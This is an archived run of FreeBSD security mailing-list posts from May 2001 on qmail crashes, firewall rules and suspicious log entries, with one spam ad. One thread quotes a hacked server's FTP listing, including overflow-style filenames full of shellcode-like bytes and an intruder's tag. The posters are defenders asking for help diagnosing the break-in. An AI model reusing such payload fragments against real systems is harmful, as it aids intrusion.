CIA BXA Export Control Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 21, 2001 at 09:35:52PM -0400, Michael Tang Helmeste wrote: > actually it just means segmentation fault > > it happens when a program accesses some memory that it doesn't own Yep; it could be a bug OR hardware. The FAQ has more on this, along with suggestions: http://www.freebsd.org/doc/en_US.ISO_8859-1/books/faq/troubleshoot.html http://www.bitwizard.nl/sig11/ -- David Dagon dagon@cc.gatech.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 20: 0: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 09F5737B424 for ; Mon, 21 May 2001 19:59:59 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 347 invoked by uid 504); 21 May 2001 19:55:28 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 21 May 2001 19:55:28 -0000 From: "Dan Graaff" To: "David Dagon" , "Michael Tang Helmeste" Cc: Subject: RE: Qmail + FreeBSD 4.3 Date: Mon, 21 May 2001 19:59:08 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: <20010521232853.A20683@fritz.cc.gt.atl.ga.us> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Actually, after some research, I found that I WAS being attacked, and I patched qmail, see: http://security-archive.merton.ox.ac.uk/bugtraq-200001/0351.html -Dan Graaff / Digital The DE-Network Majority Owner and Founder http://www.digitalextreme.org (Main) http://www.de-network.com (Hosting) Christian Liberty Network Founder and Webmaster http://www.christianliberty.net -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Dagon Sent: Monday, May 21, 2001 8:29 PM To: Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 On Mon, May 21, 2001 at 09:35:52PM -0400, Michael Tang Helmeste wrote: > actually it just means segmentation fault > > it happens when a program accesses some memory that it doesn't own Yep; it could be a bug OR hardware. The FAQ has more on this, along with suggestions: http://www.freebsd.org/doc/en_US.ISO_8859-1/books/faq/troubleshoot.html http://www.bitwizard.nl/sig11/ -- David Dagon dagon@cc.gatech.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 20: 2:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 3B78937B43C for ; Mon, 21 May 2001 20:02:16 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 381 invoked by uid 504); 21 May 2001 19:57:46 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 21 May 2001 19:57:46 -0000 From: "Dan Graaff" To: "David Dagon" , "Michael Tang Helmeste" Cc: Subject: RE: Qmail + FreeBSD 4.3 Date: Mon, 21 May 2001 20:01:25 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I lied, right after I sent that it did it again! -Dan Graaff / Digital The DE-Network -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Dan Graaff Sent: Monday, May 21, 2001 7:59 PM To: David Dagon; Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: RE: Qmail + FreeBSD 4.3 Actually, after some research, I found that I WAS being attacked, and I patched qmail, see: http://security-archive.merton.ox.ac.uk/bugtraq-200001/0351.html -Dan Graaff / Digital The DE-Network Majority Owner and Founder http://www.digitalextreme.org (Main) http://www.de-network.com (Hosting) Christian Liberty Network Founder and Webmaster http://www.christianliberty.net -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Dagon Sent: Monday, May 21, 2001 8:29 PM To: Michael Tang Helmeste Cc: freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 On Mon, May 21, 2001 at 09:35:52PM -0400, Michael Tang Helmeste wrote: > actually it just means segmentation fault > > it happens when a program accesses some memory that it doesn't own Yep; it could be a bug OR hardware. The FAQ has more on this, along with suggestions: http://www.freebsd.org/doc/en_US.ISO_8859-1/books/faq/troubleshoot.html http://www.bitwizard.nl/sig11/ -- David Dagon dagon@cc.gatech.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 2:46: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from shutdown.com (adsl-151-202-29-28.nyc.adsl.bellatlantic.net [151.202.29.28]) by hub.freebsd.org (Postfix) with SMTP id 99EE037B43E for ; Tue, 22 May 2001 02:45:56 -0700 (PDT) (envelope-from j@shutdown.com) From: "John" To: Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Date: Tue, 22 May 2001 04:25:11 -0700 Reply-To: "John" Content-Transfer-Encoding: 8bit Message-Id: <20010522094556.99EE037B43E@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey there, I found a great retail site with all kinds of products. Home decor, office decor, travel, outdoors, kitchen, etc... Take a look around at http://www.merchandisewholesale.com just click on the images of the product to enlarge it for a better view. Sincerely, John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 4:44:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from sivka.carrier.kiev.ua (sivka.carrier.kiev.ua [193.193.193.101]) by hub.freebsd.org (Postfix) with ESMTP id 57AC937B43E for ; Tue, 22 May 2001 04:44:45 -0700 (PDT) (envelope-from diman@asd-g.com) Received: from core.is.kiev.ua (p187.is.kiev.ua [62.244.5.187] (may be forged)) by sivka.carrier.kiev.ua (8/Kilkenny_is_better) with ESMTP id ORE63274; Tue, 22 May 2001 14:44:37 +0300 (EEST) (envelope-from diman@asd-g.com) Received: from [10.203.1.10] ([10.203.1.10]) by core.is.kiev.ua (8.11.1/ASDG-2.3-NR) with ESMTP id f4MBiYM73206; Tue, 22 May 2001 14:44:34 +0300 (EEST) (envelope-from diman@asd-g.com) Date: Tue, 22 May 2001 12:39:28 +0000 (GMT) From: diman X-Sender: diman@portal.none.ua To: Lowell Gilbert Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? In-Reply-To: <44ae4669z0.fsf@lowellg.ne.mediaone.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 21 May 2001, Lowell Gilbert wrote: [.......] > > > It's *possible* that the rule could be triggered by something that > > > wasn't an attack. Thinking about it briefly, it seems slightly more > > > likely that it's part of a probe, rather than an actual attack > > > However, reporting to the network administrator for that address is > > > almost certainly useless in any case, because an attacker would > > > probably have spoofed that address anyway. [An attacker wouldn't ever > > > get any response from that packet in any case.] > > > > Attacker can get answer from a destination host. It's a ipfw between > > if he willn't. Easy rule :) > > This is incorrect. The attacker can't get an answer in either case. > > The destination host won't reply unless the packet with the fragment > offset of zero *also* got through to that destination host, in which > case this rule doesn't matter. If it isn't the case, the destination > host will never get a whole packet, and will never respond. It might be 'icmp: reassembly time exceed' or something else - it's OS/Setup dependant. It might need more than 1 packet, but my point is: "rule -1" can be used for ipfw detection/identification. There are no much security risk unless u wanna hide ur frierwall from peoples looks. > > The "rule -1" situation is only useful (to attackers) as part of a > traffic analysis scheme, and not terribly even for that. However, > there's no downside to dropping these packets, so we do. > > - Lowell Yes, "traffic analysis" :-) Good Luck. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 5: 5:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from brinstar.nerim.net (brinstar.nerim.net [62.4.16.71]) by hub.freebsd.org (Postfix) with ESMTP id 0CB3037B422 for ; Tue, 22 May 2001 05:05:33 -0700 (PDT) (envelope-from chojin@nerim.net) Received: from chojin (chojin.adsl.nerim.net [62.4.22.98]) by brinstar.nerim.net (8.11.2/Raphit-20001115) with SMTP id f4MC5Q887420 for ; Tue, 22 May 2001 14:05:26 +0200 (CEST) (envelope-from chojin@nerim.net) Message-ID: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> From: "Chojin" To: References: Subject: IPF Rule problem Date: Tue, 22 May 2001 14:05:43 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In my rules I put this: pass out quick proto tcp from any to any keep state pass out quick proto udp from any to any keep state pass out quick proto icmp from any to any keep state block out quick all (123.123.123.123 is an example) pass in quick proto tcp from any to any port = 23 keep state ... block in log quick all When I use telnet -s 192.168.69.1 123.123.123.123 it works telnet -s 127.0.0.1 123.123.123.123 works too telnet -s 123.123.123.123 123.123.123.123 doesn't work Why ? Regards. Chojin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 6:14:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id BF48937B422 for ; Tue, 22 May 2001 06:14:21 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 9412DBA56; Tue, 22 May 2001 08:14:18 -0500 (CDT) Message-ID: <008001c0e2c1$1b913300$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Olivier Nicole" Cc: References: <200105220116.IAA11516@banyan.cs.ait.ac.th> Subject: Re: Qmail + FreeBSD 4.3 Date: Tue, 22 May 2001 08:14:17 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Or simply bad memory. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Olivier Nicole" To: Cc: Sent: Monday, May 21, 2001 8:16 PM Subject: Re: Qmail + FreeBSD 4.3 > Hi Dan, > > Signa 11 often denotes some hardware problem I guess, something like > overheating. > > Olivier > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 6:24: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id B992837B424 for ; Tue, 22 May 2001 06:24:04 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id C12E1BA56; Tue, 22 May 2001 08:24:01 -0500 (CDT) Message-ID: <009501c0e2c2$7712d6b0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Chojin" , References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> Subject: Re: IPF Rule problem Date: Tue, 22 May 2001 08:24:00 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Your block in rule broke it. The previous accepts were probably from a rule you didn't list. # in rare cases do we change these rules pass in quick on lo0 pass out quick on lo0 Look through your rules and you will probably see this. That is why they worked. 127.0.0.1 is on lo0. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Chojin" To: Sent: Tuesday, May 22, 2001 7:05 AM Subject: IPF Rule problem > In my rules I put this: > pass out quick proto tcp from any to any keep state > pass out quick proto udp from any to any keep state > pass out quick proto icmp from any to any keep state > block out quick all > > (123.123.123.123 is an example) > pass in quick proto tcp from any to any port = 23 keep state > ... > block in log quick all > > When I use telnet -s 192.168.69.1 123.123.123.123 it works > telnet -s 127.0.0.1 123.123.123.123 works too > telnet -s 123.123.123.123 123.123.123.123 doesn't work > > Why ? > > Regards. > > Chojin > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 6:29: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 23AA037B424 for ; Tue, 22 May 2001 06:28:59 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 7D271BA56; Tue, 22 May 2001 08:28:52 -0500 (CDT) Message-ID: <00b101c0e2c3$248722b0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: , References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <009501c0e2c2$7712d6b0$3028680a@tgt.com> Subject: Re: IPF Rule problem Date: Tue, 22 May 2001 08:28:51 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I misready your email below. Perhaps you should send your entire ruleset to the list -- a partial list is probably not good enough. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Thomas T. Veldhouse" To: "Chojin" ; Sent: Tuesday, May 22, 2001 8:24 AM Subject: Re: IPF Rule problem > Your block in rule broke it. The previous accepts were probably from a rule > you didn't list. > > # in rare cases do we change these rules > pass in quick on lo0 > pass out quick on lo0 > > Look through your rules and you will probably see this. That is why they > worked. 127.0.0.1 is on lo0. > > Tom Veldhouse > veldy@veldy.net > > ----- Original Message ----- > From: "Chojin" > To: > Sent: Tuesday, May 22, 2001 7:05 AM > Subject: IPF Rule problem > > > > In my rules I put this: > > pass out quick proto tcp from any to any keep state > > pass out quick proto udp from any to any keep state > > pass out quick proto icmp from any to any keep state > > block out quick all > > > > (123.123.123.123 is an example) > > pass in quick proto tcp from any to any port = 23 keep state > > ... > > block in log quick all > > > > When I use telnet -s 192.168.69.1 123.123.123.123 it works > > telnet -s 127.0.0.1 123.123.123.123 works too > > telnet -s 123.123.123.123 123.123.123.123 doesn't work > > > > Why ? > > > > Regards. > > > > Chojin > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 8:13:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mout0.freenet.de (mout0.freenet.de [194.97.50.131]) by hub.freebsd.org (Postfix) with ESMTP id 46BF737B422 for ; Tue, 22 May 2001 08:13:49 -0700 (PDT) (envelope-from michael.radzewitz@freenet-ag.de) Received: from [194.97.50.144] (helo=mx1.freenet.de) by mout0.freenet.de with esmtp (Exim 3.22 #1) id 152Dr2-0004t9-00 for security@freebsd.org; Tue, 22 May 2001 17:13:48 +0200 Received: from staff.freenet-ag.de ([62.104.227.5]) by mx1.freenet.de with esmtp (Exim 3.22 #1) id 152Dr1-00058U-00 for security@freebsd.org; Tue, 22 May 2001 17:13:47 +0200 Received: by staff.freenet-ag.de with Internet Mail Service (5.5.2653.19) id ; Tue, 22 May 2001 17:13:43 +0200 Message-ID: From: Michael Radzewitz To: "'security@freebsd.org'" Subject: apache_logs/system hang up Date: Tue, 22 May 2001 17:13:35 +0200 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, i've have posted this question before without a subject. sorry for that and please ignore the last mail. Once again... ...a short question because i am concerned about a log entry in the apache access and error logs. Last night I had to reset my system because it hangs. Today I've found two entry's in the logfiles mentioned above. They contain lots of non assci characters. I am not able to get some more information about the content. For me it seems to be binary-code. The log entry looks something like this lot's of: ^@^@^@ttp://www. followed by the address | | my editor display it like this (vim) I'm wondering if it's possible to send such informations over the http-protcol which causes the apache and the rest of the system to hang up or maybe it's just a hang up because god knows what went wrong at that time with the hard or software. Maybe one of you had the same problem or any other idea. Thank's in advance Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 11:43:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.blinx.net (ns2.blinx.net [205.205.72.2]) by hub.freebsd.org (Postfix) with SMTP id CAF4037B43C for ; Tue, 22 May 2001 11:43:34 -0700 (PDT) (envelope-from wacky@blinx.net) Received: (qmail 95868 invoked from network); 22 May 2001 05:42:32 -0000 Received: from ce3021279-b.montvlle1.ct.home.com (HELO home) (65.11.228.19) by www.blinx.net with SMTP; 22 May 2001 05:42:32 -0000 Message-ID: <003601c0e2ee$b006bfa0$0700a8c0@com.home.com> From: "Mike" To: "Chojin" , Cc: References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> Subject: Is there a ftp vuln in 4.3-STABLE Date: Tue, 22 May 2001 14:40:33 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, My webhosting server I believe recently got hacked. I logged in via ftp using freebsd 4.3-stable stock ftpd and it went directly to /usr/home/ftp and i will paste below what it has. I updated from 4.2-stable to 4.3-stable after the glob() patch came out. So I dont believe that its because of the glob vuln. .010512105058p 010513050858p 010515163904p 010515163907p 010520053658p 010520053659p 010520053700p 010520053701p 010520053702p 010520053709p 1mbtest.ptf frdfakAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)?P??P??)?P?fish)? f?IF1?V?I???1?V??PTPTS?;P?? pufpafAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)?P??P??)?P?fish)? f?IF1?V?I???1?V??PTPTS?;P?? ???? Tagged By Wizardz Fxp ???? -Mike -Blinx Networks ----- Original Message ----- From: "Chojin" To: Sent: Tuesday, May 22, 2001 8:05 AM Subject: IPF Rule problem > In my rules I put this: > pass out quick proto tcp from any to any keep state > pass out quick proto udp from any to any keep state > pass out quick proto icmp from any to any keep state > block out quick all > > (123.123.123.123 is an example) > pass in quick proto tcp from any to any port = 23 keep state > ... > block in log quick all > > When I use telnet -s 192.168.69.1 123.123.123.123 it works > telnet -s 127.0.0.1 123.123.123.123 works too > telnet -s 123.123.123.123 123.123.123.123 doesn't work > > Why ? > > Regards. > > Chojin > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 12:14:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 2926E37B422 for ; Tue, 22 May 2001 12:14:54 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 11242 invoked by uid 0); 22 May 2001 19:14:52 -0000 Received: from pd9508847.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.71) by mail.gmx.net (mp020-rz3) with SMTP; 22 May 2001 19:14:52 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA14531 for freebsd-security@FreeBSD.ORG; Tue, 22 May 2001 18:18:25 +0200 Date: Tue, 22 May 2001 18:18:25 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: IPF Rule problem Message-ID: <20010522181824.G253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin>; from chojin@nerim.net on Tue, May 22, 2001 at 02:05:43PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, May 22, 2001 at 14:05 +0200, Chojin wrote: > > In my rules I put this: > [ ... ] > > When I use telnet -s 192.168.69.1 123.123.123.123 it works > telnet -s 127.0.0.1 123.123.123.123 works too > telnet -s 123.123.123.123 123.123.123.123 doesn't work > > Why ? Use your packet filter's log. That's what they are there for. Or - while talking about ipfilter - make use of the iptest(1) tool. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 12:38:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from gvr.gvr.org (gvr.gvr.org [212.61.40.17]) by hub.freebsd.org (Postfix) with ESMTP id CB22337B422; Tue, 22 May 2001 12:38:30 -0700 (PDT) (envelope-from guido@gvr.org) Received: by gvr.gvr.org (Postfix, from userid 657) id 8BCD35848; Tue, 22 May 2001 21:38:29 +0200 (CEST) Date: Tue, 22 May 2001 21:38:29 +0200 From: Guido van Rooij To: Mike Cc: Chojin , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.org Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522213829.B16268@gvr.gvr.org> References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <003601c0e2ee$b006bfa0$0700a8c0@com.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <003601c0e2ee$b006bfa0$0700a8c0@com.home.com>; from wacky@blinx.net on Tue, May 22, 2001 at 02:40:33PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Obviously, the stuff below your message was somehow extracted from a log. Could you please mail all of the relevant part of the logfile? -Guido On Tue, May 22, 2001 at 02:40:33PM -0400, Mike wrote: > Hi, > My webhosting server I believe recently got hacked. I logged in via ftp > using freebsd 4.3-stable stock ftpd and it went directly to /usr/home/ftp > and i will paste below what it has. I updated from 4.2-stable to 4.3-stable > after the glob() patch came out. So I dont believe that its because of the > glob vuln. > > .010512105058p > 010513050858p > 010515163904p > 010515163907p > 010520053658p > 010520053659p > 010520053700p > 010520053701p > 010520053702p > 010520053709p > 1mbtest.ptf > frdfakAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)?P??P??)?P?fish)? > f?IF1?V?I???1?V??PTPTS?;P?? > pufpafAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)?P??P??)?P?fish)? > f?IF1?V?I???1?V??PTPTS?;P?? > ???? Tagged By Wizardz Fxp ???? > > -Mike > -Blinx Networks > ----- Original Message ----- > From: "Chojin" > To: > Sent: Tuesday, May 22, 2001 8:05 AM > Subject: IPF Rule problem > > > > In my rules I put this: > > pass out quick proto tcp from any to any keep state > > pass out quick proto udp from any to any keep state > > pass out quick proto icmp from any to any keep state > > block out quick all > > > > (123.123.123.123 is an example) > > pass in quick proto tcp from any to any port = 23 keep state > > ... > > block in log quick all > > > > When I use telnet -s 192.168.69.1 123.123.123.123 it works > > telnet -s 127.0.0.1 123.123.123.123 works too > > telnet -s 123.123.123.123 123.123.123.123 doesn't work > > > > Why ? > > > > Regards. > > > > Chojin > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -- Guido van Rooij | Phone: ++31 653 994 773 Madison Gurkha, Technology Think-Tank | guido@madison-gurkha.com | FreeBSD committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 13:32:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id ECB0737B424 for ; Tue, 22 May 2001 13:32:48 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.59.63]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010522203248.NDVR16174.tomts7-srv.bellnexxia.net@frogbox.glassfish.net> for ; Tue, 22 May 2001 16:32:48 -0400 Received: (qmail 9346 invoked from network); 22 May 2001 20:35:34 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 22 May 2001 20:35:34 -0000 From: "Michael Tang Helmeste" To: "Thomas T. 